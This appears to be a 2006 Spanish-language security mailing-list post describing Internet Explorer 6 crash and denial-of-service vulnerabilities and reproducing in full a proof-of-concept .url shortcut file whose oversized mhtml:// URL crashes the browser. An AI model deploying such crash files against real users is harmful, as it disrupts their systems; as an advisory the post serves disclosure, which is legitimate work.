| | Asunto: | [Boletin-RTM] Vulnerabilidades | | Fecha: | 1 de Junio, 2006 21:14:21 (+0200) | | Autor: | OpTix <optix @........org>
|
|
--------------------------------------------------------------------------------------------------------------------------------------------------------------
Se han anunciado diversas vulnerabilidades nuevas en Internet Explorer 6, que
pueden provocar
la caída del popular navegador de Microsoft.
--------------------------------------------------------------------------------------------------
[-----------------------------------------------------------------------------------------------------------------------------]
El primero de los problemas se trata de una vulnerabilidad al tratar de
obtener
el valor al cual apunta un puntero nulo lo que produce una caída del
navegador.
Cuando se crea una etiqueta de applet vacía, anterior a cualquier otra
etiqueta
html, Internet Explorer tendrá un puntero nulo sin llegar a cerrar la
etiqueta,
lo que provocará su caída.
También se ha anunciado un segundo problema, evidenciado cuando se trata de
entrar en un bucle infinito. Esto provoca que Internet Explorer se cierre y
muestra un erróneo "unknown software exception". Por último, se ha anunciado
un
problema de denegación de servicio, cuando se crea un frame con determinadas
condiciones y se produce una pulsación sobre el área de dicho frame.
Se han publicado pruebas de concepto de todos los problemas descritos, por
lo
que hasta la ahora no se ha dado una solucion con certeza.
[------------------------------------------------------------------------------------------------------------------------------]
------------------------------Niega.url-------------------------------
[DEFAULT]
BASEURL=
[InternetShortcut]
URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA
/*
*
* Internet Explorer overflow Vulnerbility [Proof of concept]
* Bug discovered by Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Microsoft Internet Explorer 6.x
* Severity: Unknown
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: Mr.Niega (at) gmail (dot) com [email concealed]
* Credits goes out to MarjinZ and Andvare
*
* Note: By right clicking on the file explorer will crash
* Note: del=crash,F2=crash Use cmd to delete file
*/
------------------------------Niega.url-------------------------------
mas
informacion: ------------->> [ http://www.securityfocus.com/bid/18198 ]
Un
saludo a las autoridades, pronto estara el sitio en linea.... otra vez.
|
Vulnerabilidades
Responder a este mensaje